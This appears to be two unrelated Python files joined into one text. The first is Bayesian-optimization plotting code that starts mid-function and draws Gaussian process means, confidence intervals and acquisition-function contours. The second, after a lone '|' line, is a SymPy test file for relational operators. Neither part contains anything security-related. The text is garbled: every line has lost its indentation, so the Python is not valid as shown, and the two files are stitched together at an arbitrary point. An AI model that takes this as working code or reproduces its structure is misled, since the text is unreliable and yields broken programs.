#temp_yaxis_original=np.concatenate([mu_original - 1.9600 * sigma_original, (mu_original + 1.9600 * sigma_original)[::-1]])
temp_yaxis=np.concatenate([mu - 1.9600 * sigma, (mu + 1.9600 * sigma)[::-1]])
temp_yaxis_original=temp_yaxis*(np.max(bo.Y_original)-np.min(bo.Y_original))+np.mean(bo.Y_original)
axis.fill(temp_xaxis, temp_yaxis_original,alpha=.6, fc='c', ec='None', label='95% CI')
axis.set_xlim((np.min(x_original), np.max(x_original)))
#axis.set_ylim((None, None))
axis.set_ylabel('f(x)', fontdict={'size':16})
axis.set_xlabel('x', fontdict={'size':16})
utility = bo.acq_func.acq_kind(x.reshape((-1, 1)), bo.gp, np.max(bo.Y))
acq.plot(x_original, utility, label='Utility Function', color='purple')
acq.plot(x_original[np.argmax(utility)], np.max(utility), '*', markersize=15,
label=u'Next Best Guess', markerfacecolor='gold', markeredgecolor='k', markeredgewidth=1)
# check batch BO
try:
nSelectedPoints=np.int(bo.NumPoints[-1])
except:
nSelectedPoints=1
max_point=np.max(utility)
acq.plot(bo.X_original[-nSelectedPoints:], max_point.repeat(nSelectedPoints), 'v', markersize=15,
label=u'Previous Selection', markerfacecolor='green', markeredgecolor='k', markeredgewidth=1)
acq.set_xlim((np.min(x_original), np.max(x_original)))
#acq.set_ylim((0, np.max(utility) + 0.5))
acq.set_ylim((np.min(utility), 1.1*np.max(utility)))
acq.set_ylabel('Acq', fontdict={'size':16})
acq.set_xlabel('x', fontdict={'size':16})
axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
def plot_bo_2d(bo):
x1 = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 100)
x2 = np.linspace(bo.scalebounds[1,0], bo.scalebounds[1,1], 100)
x1g,x2g=np.meshgrid(x1,x2)
X=np.c_[x1g.flatten(), x2g.flatten()]
x1_ori = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 100)
x2_ori = np.linspace(bo.bounds[1,0], bo.bounds[1,1], 100)
x1g_ori,x2g_ori=np.meshgrid(x1_ori,x2_ori)
X_ori=np.c_[x1g_ori.flatten(), x2g_ori.flatten()]
fig = plt.figure()
#axis2d = fig.add_subplot(1, 2, 1)
acq2d = fig.add_subplot(1, 1, 1)
#mu, sigma = bo.posterior(X)
# plot the acquisition function
utility = bo.acq_func.acq_kind(X, bo.gp, np.max(bo.Y))
#acq3d.plot_surface(x1g,x1g,utility.reshape(x1g.shape))
CS_acq=acq2d.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=my_cmap,origin='lower')
CS2_acq = plt.contour(CS_acq, levels=CS_acq.levels[::2],colors='r',origin='lower',hold='on')
idxBest=np.argmax(utility)
#acq2d.scatter(X_ori[idxBest,0],X_ori[idxBest,1],color='b',s=30,label='Current Peak')
#acq2d.scatter(bo.X_original[:,0],bo.X_original[:,1],color='g',label='Observations')
#acq2d.scatter(bo.X_original[-1,0],bo.X_original[-1,1],color='r',s=30,label='Previous Selection')
acq2d.scatter(bo.X_original[-1,0],bo.X_original[-1,1],marker='*', color='green',s=100,label='Previous Selection')
acq2d.set_title('Acquisition Function',fontsize=16)
acq2d.set_xlim(bo.bounds[0,0], bo.bounds[0,1])
acq2d.set_ylim(bo.bounds[1,0], bo.bounds[1,1])
#acq2d.legend(loc=1, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#acq2d.legend(loc='center left',bbox_to_anchor=(1.01, 0.5))
fig.colorbar(CS_acq, ax=acq2d, shrink=0.9)
#acq.set_xlim((np.min(x), np.max(x)))
#acq.set_ylim((np.min(utility), 1.1*np.max(utility)))
#acq.set_ylabel('Acq', fontdict={'size':16})
#acq.set_xlabel('x', fontdict={'size':16})
#axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
def plot_bo_2d_FBO(bo,myfunction):
global counter
counter=counter+1
strFolder="P:\\03.Research\\05.BayesianOptimization\\PradaBayesianOptimization\\plot_Nov_2016"
x1 = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 100)
x2 = np.linspace(bo.scalebounds[1,0], bo.scalebounds[1,1], 100)
x1g,x2g=np.meshgrid(x1,x2)
X=np.c_[x1g.flatten(), x2g.flatten()]
x1_ori = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 100)
x2_ori = np.linspace(bo.bounds[1,0], bo.bounds[1,1], 100)
x1g_ori,x2g_ori=np.meshgrid(x1_ori,x2_ori)
X_ori=np.c_[x1g_ori.flatten(), x2g_ori.flatten()]
fig = plt.figure(figsize=(10, 3.5))
#axis2d = fig.add_subplot(1, 2, 1)
# plot invasion set
acq_expansion = fig.add_subplot(1, 2, 1)
x1 = np.linspace(bo.b_limit_lower[0], bo.b_limit_upper[0], 100)
x2 = np.linspace(bo.b_limit_lower[1], bo.b_limit_upper[1], 100)
x1g_ori_limit,x2g_ori_limit=np.meshgrid(x1,x2)
X_plot=np.c_[x1g_ori_limit.flatten(), x2g_ori_limit.flatten()]
Y = myfunction.func(X_plot)
Y=-np.log(np.abs(Y))
CS_expansion=acq_expansion.contourf(x1g_ori_limit,x2g_ori_limit,Y.reshape(x1g_ori.shape),cmap=my_cmap,origin='lower')
if len(bo.X_invasion)!=0:
myinvasion_set=acq_expansion.scatter(bo.X_invasion[:,0],bo.X_invasion[:,1],color='m',s=1,label='Invasion Set')
else:
myinvasion_set=[]
myrectangle=patches.Rectangle(bo.bounds_bk[:,0], bo.max_min_gap_bk[0],bo.max_min_gap_bk[1],
alpha=0.3, fill=False, facecolor="#00ffff",linewidth=3)
acq_expansion.add_patch(myrectangle)
acq_expansion.set_xlim(bo.b_limit_lower[0]-0.2, bo.b_limit_upper[0]+0.2)
acq_expansion.set_ylim(bo.b_limit_lower[1]-0.2, bo.b_limit_upper[1]+0.2)
if len(bo.X_invasion)!=0:
acq_expansion.legend([myrectangle,myinvasion_set],[ur'$X_{t-1}$',ur'$I_t$'],loc=4,ncol=1,prop={'size':16},scatterpoints = 5)
strTitle_Inv="[t={:d}] Invasion Set".format(counter)
acq_expansion.set_title(strTitle_Inv,fontsize=16)
else:
acq_expansion.legend([myrectangle,myinvasion_set],[ur'$X_{t-1}$',ur'Empty $I_t$'],loc=4,ncol=1,prop={'size':16},scatterpoints = 5)
strTitle_Inv="[t={:d}] Empty Invasion Set".format(counter)
acq_expansion.set_title(strTitle_Inv,fontsize=16)
# plot acquisition function
acq2d = fig.add_subplot(1, 2, 2)
utility = bo.acq_func.acq_kind(X, bo.gp, np.max(bo.Y))
#acq3d.plot_surface(x1g,x1g,utility.reshape(x1g.shape))
CS_acq=acq2d.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=my_cmap,origin='lower')
CS2_acq = plt.contour(CS_acq, levels=CS_acq.levels[::2],colors='r',origin='lower',hold='on')
idxBest=np.argmax(utility)
myrectangle=patches.Rectangle(bo.bounds[:,0], bo.max_min_gap[0],bo.max_min_gap[1],
alpha=0.3, fill=False, facecolor="#00ffff",linewidth=3)
acq2d.add_patch(myrectangle)
#acq2d.scatter(X_ori[idxBest,0],X_ori[idxBest,1],color='b',s=30,label='Current Peak')
myobs=acq2d.scatter(bo.X_original[:,0],bo.X_original[:,1],color='g',s=6,label='Data')
#acq2d.scatter(bo.X_original[-1,0],bo.X_original[-1,1],color='r',s=30,label='Previous Selection')
#acq2d.set_xlim(bo.bounds[0,0], bo.bounds[0,1])
#acq2d.set_ylim(bo.bounds[1,0], bo.bounds[1,1])
acq2d.set_xlim(bo.b_limit_lower[0]-0.2, bo.b_limit_upper[0]+0.2)
acq2d.set_ylim(bo.b_limit_lower[1]-0.2, bo.b_limit_upper[1]+0.2)
#acq2d.legend(loc=1, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#acq2d.legend(loc='center left',bbox_to_anchor=(1.2, 0.5))
#acq2d.legend(loc=4)
acq2d.legend([myrectangle,myobs],[ur'$X_{t}$','Data'],loc=4,ncol=1,prop={'size':16}, scatterpoints = 3)
strTitle_Acq="[t={:d}] Acquisition Func".format(counter)
acq2d.set_title(strTitle_Acq,fontsize=16)
fig.colorbar(CS_expansion, ax=acq_expansion, shrink=0.9)
fig.colorbar(CS_acq, ax=acq2d, shrink=0.9)
#acq.set_xlim((np.min(x), np.max(x)))
#acq.set_ylim((np.min(utility), 1.1*np.max(utility)))
#acq.set_ylabel('Acq', fontdict={'size':16})
#acq.set_xlabel('x', fontdict={'size':16})
#axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
strFileName="{:d}_bubo.eps".format(counter)
strPath=os.path.join(strFolder,strFileName)
#print strPath
#fig.savefig(strPath, bbox_inches='tight')
def plot_bo_2d_withGPmeans(bo):
x1 = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 100)
x2 = np.linspace(bo.scalebounds[1,0], bo.scalebounds[1,1], 100)
x1g,x2g=np.meshgrid(x1,x2)
X=np.c_[x1g.flatten(), x2g.flatten()]
x1_ori = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 100)
x2_ori = np.linspace(bo.bounds[1,0], bo.bounds[1,1], 100)
x1g_ori,x2g_ori=np.meshgrid(x1_ori,x2_ori)
X_ori=np.c_[x1g_ori.flatten(), x2g_ori.flatten()]
#fig.suptitle('Gaussian Process and Utility Function After {} Points'.format(len(bo.X)), fontdict={'size':18})
fig = plt.figure(figsize=(12, 5))
#axis3d = fig.add_subplot(1, 2, 1, projection='3d')
axis2d = fig.add_subplot(1, 2, 1)
#acq3d = fig.add_subplot(2, 2, 3, projection='3d')
acq2d = fig.add_subplot(1, 2, 2)
mu, sigma = bo.posterior(X)
#axis.plot(x, y, linewidth=3, label='Target')
#axis3d.plot_surface(x1g,x1g,mu.reshape(x1g.shape))
#axis3d.scatter(bo.X[:,0],bo.X[:,1], bo.Y,zdir='z', label=u'Observations', color='r')
CS=axis2d.contourf(x1g_ori,x2g_ori,mu.reshape(x1g.shape),cmap=plt.cm.bone,origin='lower')
CS2 = plt.contour(CS, levels=CS.levels[::2],colors='r',origin='lower',hold='on')
axis2d.scatter(bo.X_original[:,0],bo.X_original[:,1], label=u'Observations', color='g')
axis2d.set_title('Gaussian Process Mean',fontsize=16)
axis2d.set_xlim(bo.bounds[0,0], bo.bounds[0,1])
axis2d.set_ylim(bo.bounds[1,0], bo.bounds[1,1])
fig.colorbar(CS, ax=axis2d, shrink=0.9)
#plt.colorbar(ax=axis2d)
#axis.plot(x, mu, '--', color='k', label='Prediction')
#axis.set_xlim((np.min(x), np.max(x)))
#axis.set_ylim((None, None))
#axis.set_ylabel('f(x)', fontdict={'size':16})
#axis.set_xlabel('x', fontdict={'size':16})
# plot the acquisition function
utility = bo.acq_func.acq_kind(X, bo.gp, np.max(bo.Y))
#acq3d.plot_surface(x1g,x1g,utility.reshape(x1g.shape))
#CS_acq=acq2d.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=plt.cm.bone,origin='lower')
CS_acq=acq2d.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=my_cmap,origin='lower')
CS2_acq = plt.contour(CS_acq, levels=CS_acq.levels[::2],colors='r',origin='lower',hold='on')
idxBest=np.argmax(utility)
acq2d.scatter(bo.X_original[:,0],bo.X_original[:,1],color='g')
acq2d.scatter(bo.X_original[-1,0],bo.X_original[-1,1],color='r',s=60)
acq2d.scatter(X_ori[idxBest,0],X_ori[idxBest,1],color='b',s=60)
acq2d.set_title('Acquisition Function',fontsize=16)
acq2d.set_xlim(bo.bounds[0,0]-0.2, bo.bounds[0,1]+0.2)
acq2d.set_ylim(bo.bounds[1,0]-0.2, bo.bounds[1,1]+0.2)
#acq.set_xlim((np.min(x), np.max(x)))
#acq.set_ylim((np.min(utility), 1.1*np.max(utility)))
#acq.set_ylabel('Acq', fontdict={'size':16})
#acq.set_xlabel('x', fontdict={'size':16})
#axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
fig.colorbar(CS_acq, ax=acq2d, shrink=0.9)
def plot_bo_2d_withGPmeans_Sigma(bo):
x1 = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 100)
x2 = np.linspace(bo.scalebounds[1,0], bo.scalebounds[1,1], 100)
x1g,x2g=np.meshgrid(x1,x2)
X=np.c_[x1g.flatten(), x2g.flatten()]
x1_ori = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 100)
x2_ori = np.linspace(bo.bounds[1,0], bo.bounds[1,1], 100)
x1g_ori,x2g_ori=np.meshgrid(x1_ori,x2_ori)
X_ori=np.c_[x1g_ori.flatten(), x2g_ori.flatten()]
#fig.suptitle('Gaussian Process and Utility Function After {} Points'.format(len(bo.X)), fontdict={'size':18})
fig = plt.figure(figsize=(12, 3))
#axis3d = fig.add_subplot(1, 2, 1, projection='3d')
axis2d = fig.add_subplot(1, 2, 1)
#acq3d = fig.add_subplot(2, 2, 3, projection='3d')
acq2d = fig.add_subplot(1, 2, 2)
mu, sigma = bo.posterior(X)
#axis.plot(x, y, linewidth=3, label='Target')
#axis3d.plot_surface(x1g,x1g,mu.reshape(x1g.shape))
#axis3d.scatter(bo.X[:,0],bo.X[:,1], bo.Y,zdir='z', label=u'Observations', color='r')
utility = bo.acq_func.acq_kind(X, bo.gp, np.max(bo.Y))
CS=axis2d.contourf(x1g_ori,x2g_ori,mu.reshape(x1g.shape),cmap=plt.cm.bone,origin='lower')
CS2 = plt.contour(CS, levels=CS.levels[::2],colors='r',origin='lower',hold='on')
axis2d.scatter(bo.X_original[:,0],bo.X_original[:,1], label=u'Observations', color='g')
axis2d.set_title('Gaussian Process Mean',fontsize=16)
axis2d.set_xlim(bo.bounds[0,0], bo.bounds[0,1])
axis2d.set_ylim(bo.bounds[1,0], bo.bounds[1,1])
fig.colorbar(CS, ax=axis2d, shrink=0.9)
#CS_acq=acq2d.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=plt.cm.bone,origin='lower')
CS_acq=acq2d.contourf(x1g_ori,x2g_ori,sigma.reshape(x1g.shape),cmap=my_cmap,origin='lower')
CS2_acq = plt.contour(CS_acq, levels=CS_acq.levels[::2],colors='r',origin='lower',hold='on')
idxBest=np.argmax(utility)
acq2d.scatter(bo.X_original[:,0],bo.X_original[:,1],color='g')
acq2d.scatter(bo.X_original[-1,0],bo.X_original[-1,1],color='r',s=60)
acq2d.scatter(X_ori[idxBest,0],X_ori[idxBest,1],color='b',s=60)
acq2d.set_title('Gaussian Process Variance',fontsize=16)
#acq2d.set_xlim(bo.bounds[0,0]-0.2, bo.bounds[0,1]+0.2)
#acq2d.set_ylim(bo.bounds[1,0]-0.2, bo.bounds[1,1]+0.2)
fig.colorbar(CS_acq, ax=acq2d, shrink=0.9)
def plot_gp_batch(self,x,y):
bo=self.myBo
n_batch=bo.NumPoints
fig=plt.figure(figsize=(16, 10))
fig.suptitle('Gaussian Process and Utility Function After {} Steps'.format(len(bo.X)), fontdict={'size':30})
gs = gridspec.GridSpec(2, 1, height_ratios=[3, 1])
axis = plt.subplot(gs[0])
acq = plt.subplot(gs[1])
mu, sigma = posterior(bo)
axis.plot(x, y, linewidth=3, label='Target')
axis.plot(bo.X.flatten(), bo.Y, 'D', markersize=8, label=u'Observations', color='r')
axis.plot(x, mu, '--', color='k', label='GP mean')
axis.fill(np.concatenate([x, x[::-1]]),
np.concatenate([mu - 1.9600 * sigma, (mu + 1.9600 * sigma)[::-1]]),
alpha=.6, fc='c', ec='None', label='95% confidence interval')
axis.set_xlim((-2, 10))
axis.set_ylim((None, None))
axis.set_ylabel('f(x)', fontdict={'size':20})
axis.set_xlabel('x', fontdict={'size':20})
utility = bo.acq_func.acq_kind(x.reshape((-1, 1)), bo.gp, 0)
acq.plot(x, utility, label='Utility Function', color='purple')
#selected_x=x[np.argmax(utility)]
#selected_y=np.max(utility)
selected_x=bo.X[-1-n_batch:]
selected_y=utility(selected_x)
acq.plot(selected_x, selected_y,'*', markersize=15,
label=u'Next Best Guess', markerfacecolor='gold', markeredgecolor='k', markeredgewidth=1)
acq.set_xlim((-2, 10))
acq.set_ylim((0, np.max(utility) + 0.5))
acq.set_ylabel('Utility', fontdict={'size':20})
acq.set_xlabel('x', fontdict={'size':20})
axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
def plot_original_function(myfunction):
origin = 'lower'
func=myfunction.func
if myfunction.input_dim==1:
x = np.linspace(myfunction.bounds['x'][0], myfunction.bounds['x'][1], 1000)
y = func(x)
fig=plt.figure(figsize=(8, 5))
plt.plot(x, y)
strTitle="{:s}".format(myfunction.name)
plt.title(strTitle)
if myfunction.input_dim==2:
# Create an array with parameters bounds
if isinstance(myfunction.bounds,dict):
# Get the name of the parameters
bounds = []
for key in myfunction.bounds.keys():
bounds.append(myfunction.bounds[key])
bounds = np.asarray(bounds)
else:
bounds=np.asarray(myfunction.bounds)
x1 = np.linspace(bounds[0][0], bounds[0][1], 100)
x2 = np.linspace(bounds[1][0], bounds[1][1], 100)
x1g,x2g=np.meshgrid(x1,x2)
X_plot=np.c_[x1g.flatten(), x2g.flatten()]
Y = func(X_plot)
#fig=plt.figure(figsize=(8, 5))
#fig = plt.figure(figsize=(12, 3.5))
fig = plt.figure(figsize=(6, 3.5))
ax3d = fig.add_subplot(1, 1, 1, projection='3d')
#ax2d = fig.add_subplot(1, 2, 2)
ax3d.plot_surface(x1g,x2g,Y.reshape(x1g.shape),cmap=my_cmap)
alpha = 30 # degrees
#mlab.view(azimuth=0, elevation=90, roll=-90+alpha)
strTitle="{:s}".format(myfunction.name)
#print strTitle
ax3d.set_title(strTitle)
#plt.plot(x, y)
#CS=ax2d.contourf(x1g,x2g,Y.reshape(x1g.shape),cmap=my_cmap,origin=origin)
#CS2 = plt.contour(CS, levels=CS.levels[::2],colors='r',origin=origin,hold='on')
#plt.colorbar(CS2, ax=ax2d, shrink=0.9)
strFolder="P:\\03.Research\\05.BayesianOptimization\\PradaBayesianOptimization\\plot_August_2016\\ei_eli"
strFileName="{:s}.eps".format(myfunction.name)
strPath=os.path.join(strFolder,strFileName)
#fig.savefig(strPath, bbox_inches='tight')
def plot_bo_multiple_gp_1d(bo):
func=bo.f
x = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 1000)
x_original=x*bo.max_min_gap+bo.bounds[:,0]
y_original = func(x_original)
fig=plt.figure(figsize=(10, 5))
fig.suptitle('Gaussian Process and Utility Function After {} Points'.format(len(bo.X)), fontdict={'size':18})
gs = gridspec.GridSpec(3, 1, height_ratios=[3,1,1])
axis = plt.subplot(gs[0])
acq = plt.subplot(gs[1])
acq_integrated=plt.subplot(gs[2])
mu, sigma = bo.posterior(x)
#mu_original=mu*(np.max(bo.Y_original)-np.min(bo.Y_original))+np.mean(bo.Y_original)
nGP=len(mu)
axis.plot(x_original, y_original, linewidth=3, label='Real Function')
axis.plot(bo.X_original.flatten(), bo.Y_original, 'D', markersize=8, label=u'Observations', color='r')
for idx in range(nGP):
mu_original=mu[idx]*(np.max(bo.Y_original)-np.min(bo.Y_original))+np.mean(bo.Y_original)
axis.plot(x_original,mu_original,'--',color = "#%06x" % random.randint(0, 0xFFFFFF),label='GP Theta={:.2f}'.format(bo.theta[idx]),linewidth=2)
temp_xaxis=np.concatenate([x_original, x_original[::-1]])
temp_yaxis=np.concatenate([mu[idx] - 1.9600 * sigma[idx], (mu[idx] + 1.9600 * sigma[idx])[::-1]])
temp_yaxis_original=temp_yaxis*(np.max(bo.Y_original)-np.min(bo.Y_original))+np.mean(bo.Y_original)
axis.fill(temp_xaxis, temp_yaxis_original,alpha=.6, fc='c', ec='None', label='95% CI')
#axis.set_xlim((np.min(x), np.max(x)))
axis.set_ylim((np.min(y_original)*2, np.max(y_original)*2))
axis.set_ylabel('f(x)', fontdict={'size':16})
axis.set_xlabel('x', fontdict={'size':16})
## estimate the utility
utility = bo.acq_func.acq_kind(x.reshape((-1, 1)), bo.gp, bo.Y.max())
for idx in range(nGP):
acq.plot(x_original, utility[idx], label='Acq Func GP {:.2f}'.format(bo.theta[idx]),
color="#%06x" % random.randint(0, 0xFFFFFF),linewidth=2)
acq.plot(x_original[np.argmax(utility[idx])], np.max(utility[idx]), '*', markersize=15,
label=u'Next Guess GP {:.2f}'.format(bo.theta[idx]), markerfacecolor='gold', markeredgecolor='k', markeredgewidth=1)
acq.set_xlim((np.min(x_original), np.max(x_original)))
#acq.set_ylim((0, np.max(utility[0]) + 0.5))
acq.set_ylabel('Acq', fontdict={'size':16})
acq.set_xlabel('x', fontdict={'size':16})
axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
## estimate the integrated acquisition function
util_integrated = bo.acq_func.utility_plot(x.reshape((-1, 1)), bo.gp, bo.Y.max())
acq_integrated.plot(x, util_integrated, label='Acq Int-Func GP',
color="#%06x" % random.randint(0, 0xFFFFFF),linewidth=2)
acq_integrated.plot(x[np.argmax(util_integrated)], np.max(util_integrated), '*', markersize=15,
label=u'Next Guess', markerfacecolor='gold', markeredgecolor='k', markeredgewidth=1)
acq_integrated.set_xlim((np.min(x), np.max(x)))
acq_integrated.set_ylim((0, np.max(util_integrated) + 0.1))
acq_integrated.set_ylabel('Int-Acq', fontdict={'size':16})
acq_integrated.set_xlabel('x', fontdict={'size':16})
axis.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
acq.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
acq_integrated.legend(loc=2, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#===========================================
def plot_gp_batch(bo,x,y):
n_batch=bo.NumPoints[-1]
x1 = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 100)
x2 = np.linspace(bo.scalebounds[1,0], bo.scalebounds[1,1], 100)
x1g,x2g=np.meshgrid(x1,x2)
X=np.c_[x1g.flatten(), x2g.flatten()]
x1_ori = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 100)
x2_ori = np.linspace(bo.bounds[1,0], bo.bounds[1,1], 100)
x1g_ori,x2g_ori=np.meshgrid(x1_ori,x2_ori)
X_ori=np.c_[x1g_ori.flatten(), x2g_ori.flatten()]
fig = plt.figure()
#axis2d = fig.add_subplot(1, 2, 1)
acq2d = fig.add_subplot(1, 1, 1)
#mu, sigma = bo.posterior(X)
# plot the acquisition function
utility = bo.acq_func.acq_kind(X, bo.gp, np.max(bo.Y))
#acq3d.plot_surface(x1g,x1g,utility.reshape(x1g.shape))
CS_acq=acq2d.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=my_cmap,origin='lower')
CS2_acq = plt.contour(CS_acq, levels=CS_acq.levels[::2],colors='r',origin='lower',hold='on')
idxBest=np.argmax(utility)
#acq2d.scatter(X_ori[idxBest,0],X_ori[idxBest,1],color='b',s=30,label='Current Peak')
#acq2d.scatter(bo.X_original[:,0],bo.X_original[:,1],color='g',label='Observations')
#acq2d.scatter(bo.X_original[-1,0],bo.X_original[-1,1],color='r',s=30,label='Previous Selection')
acq2d.scatter(bo.X_original[:,0],bo.X_original[:,1], marker='*',label=u'Estimated Peaks by IGMM', s=100,color='green')
acq2d.set_title('Acquisition Function',fontsize=16)
acq2d.set_xlim(bo.bounds[0,0], bo.bounds[0,1])
acq2d.set_ylim(bo.bounds[1,0], bo.bounds[1,1])
#acq2d.legend(loc=1, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#acq2d.legend(loc='center left',bbox_to_anchor=(1.01, 0.5))
fig.colorbar(CS_acq, ax=acq2d, shrink=0.9)
def plot_gp_sequential_batch(bo,x_seq,x_batch):
global counter
counter=counter+1
x1 = np.linspace(bo.scalebounds[0,0], bo.scalebounds[0,1], 100)
x2 = np.linspace(bo.scalebounds[1,0], bo.scalebounds[1,1], 100)
x1g,x2g=np.meshgrid(x1,x2)
X=np.c_[x1g.flatten(), x2g.flatten()]
x1_ori = np.linspace(bo.bounds[0,0], bo.bounds[0,1], 100)
x2_ori = np.linspace(bo.bounds[1,0], bo.bounds[1,1], 100)
x1g_ori,x2g_ori=np.meshgrid(x1_ori,x2_ori)
X_ori=np.c_[x1g_ori.flatten(), x2g_ori.flatten()]
fig=plt.figure(figsize=(10, 3))
#axis2d = fig.add_subplot(1, 2, 1)
acq2d_seq = fig.add_subplot(1, 2, 1)
acq2d_batch = fig.add_subplot(1, 2, 2)
#mu, sigma = bo.posterior(X)
# plot the acquisition function
utility = bo.acq_func.acq_kind(X, bo.gp, np.max(bo.Y))
#acq3d.plot_surface(x1g,x1g,utility.reshape(x1g.shape))
CS_acq=acq2d_seq.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=my_cmap,origin='lower')
#CS2_acq = plt.contour(CS_acq, levels=CS_acq.levels[::2],colors='r',origin='lower',hold='on')
acq2d_seq.scatter(x_seq[0],x_seq[1], marker='*',label=u'Estimated Peaks by IGMM', s=100,color='green')
acq2d_seq.set_title('Sequential Bayesian Optimization',fontsize=16)
acq2d_seq.set_xlim(bo.bounds[0,0]-0.2, bo.bounds[0,1]+0.2)
acq2d_seq.set_ylim(bo.bounds[1,0]-0.2, bo.bounds[1,1]+0.2)
#acq2d.legend(loc=1, bbox_to_anchor=(1.01, 1), borderaxespad=0.)
#acq2d.legend(loc='center left',bbox_to_anchor=(1.01, 0.5))
fig.colorbar(CS_acq, ax=acq2d_seq, shrink=0.9)
CS_acq_batch=acq2d_batch.contourf(x1g_ori,x2g_ori,utility.reshape(x1g.shape),cmap=my_cmap,origin='lower')
#CS2_acq_batch = plt.contour(CS_acq_batch, levels=CS_acq_batch.levels[::2],colors='r',origin='lower',hold='on')
acq2d_batch.scatter(x_batch[:,0],x_batch[:,1], marker='*',label=u'Estimated Peaks by IGMM', s=100,color='green')
acq2d_batch.set_title('Batch Bayesian Optimization',fontsize=16)
acq2d_batch.set_xlim(bo.bounds[0,0]-0.2, bo.bounds[0,1]+0.2)
acq2d_batch.set_ylim(bo.bounds[1,0]-0.2, bo.bounds[1,1]+0.2)
fig.colorbar(CS_acq_batch, ax=acq2d_batch, shrink=0.9)
strFolder="V:\\plot_Nov_2016\\sequential_batch"
strFileName="{:d}.eps".format(counter)
strPath=os.path.join(strFolder,strFileName)
fig.savefig(strPath, bbox_inches='tight')
|
from sympy.utilities.pytest import XFAIL, raises
from sympy import (S, Symbol, symbols, nan, oo, I, pi, Float, And, Or,
Not, Implies, Xor, zoo, sqrt, Rational, simplify, Function, Eq,
log, cos, sin)
from sympy.core.compatibility import range
from sympy.core.relational import (Relational, Equality, Unequality,
GreaterThan, LessThan, StrictGreaterThan,
StrictLessThan, Rel, Eq, Lt, Le,
Gt, Ge, Ne)
from sympy.sets.sets import Interval, FiniteSet
x, y, z, t = symbols('x,y,z,t')
def test_rel_ne():
assert Relational(x, y, '!=') == Ne(x, y)
# issue 6116
p = Symbol('p', positive=True)
assert Ne(p, 0) is S.true
def test_rel_subs():
e = Relational(x, y, '==')
e = e.subs(x, z)
assert isinstance(e, Equality)
assert e.lhs == z
assert e.rhs == y
e = Relational(x, y, '>=')
e = e.subs(x, z)
assert isinstance(e, GreaterThan)
assert e.lhs == z
assert e.rhs == y
e = Relational(x, y, '<=')
e = e.subs(x, z)
assert isinstance(e, LessThan)
assert e.lhs == z
assert e.rhs == y
e = Relational(x, y, '>')
e = e.subs(x, z)
assert isinstance(e, StrictGreaterThan)
assert e.lhs == z
assert e.rhs == y
e = Relational(x, y, '<')
e = e.subs(x, z)
assert isinstance(e, StrictLessThan)
assert e.lhs == z
assert e.rhs == y
e = Eq(x, 0)
assert e.subs(x, 0) is S.true
assert e.subs(x, 1) is S.false
def test_wrappers():
e = x + x**2
res = Relational(y, e, '==')
assert Rel(y, x + x**2, '==') == res
assert Eq(y, x + x**2) == res
res = Relational(y, e, '<')
assert Lt(y, x + x**2) == res
res = Relational(y, e, '<=')
assert Le(y, x + x**2) == res
res = Relational(y, e, '>')
assert Gt(y, x + x**2) == res
res = Relational(y, e, '>=')
assert Ge(y, x + x**2) == res
res = Relational(y, e, '!=')
assert Ne(y, x + x**2) == res
def test_Eq():
assert Eq(x**2) == Eq(x**2, 0)
assert Eq(x**2) != Eq(x**2, 1)
assert Eq(x, x) # issue 5719
# issue 6116
p = Symbol('p', positive=True)
assert Eq(p, 0) is S.false
def test_rel_Infinity():
# NOTE: All of these are actually handled by sympy.core.Number, and do
# not create Relational objects.
assert (oo > oo) is S.false
assert (oo > -oo) is S.true
assert (oo > 1) is S.true
assert (oo < oo) is S.false
assert (oo < -oo) is S.false
assert (oo < 1) is S.false
assert (oo >= oo) is S.true
assert (oo >= -oo) is S.true
assert (oo >= 1) is S.true
assert (oo <= oo) is S.true
assert (oo <= -oo) is S.false
assert (oo <= 1) is S.false
assert (-oo > oo) is S.false
assert (-oo > -oo) is S.false
assert (-oo > 1) is S.false
assert (-oo < oo) is S.true
assert (-oo < -oo) is S.false
assert (-oo < 1) is S.true
assert (-oo >= oo) is S.false
assert (-oo >= -oo) is S.true
assert (-oo >= 1) is S.false
assert (-oo <= oo) is S.true
assert (-oo <= -oo) is S.true
assert (-oo <= 1) is S.true
def test_bool():
assert Eq(0, 0) is S.true
assert Eq(1, 0) is S.false
assert Ne(0, 0) is S.false
assert Ne(1, 0) is S.true
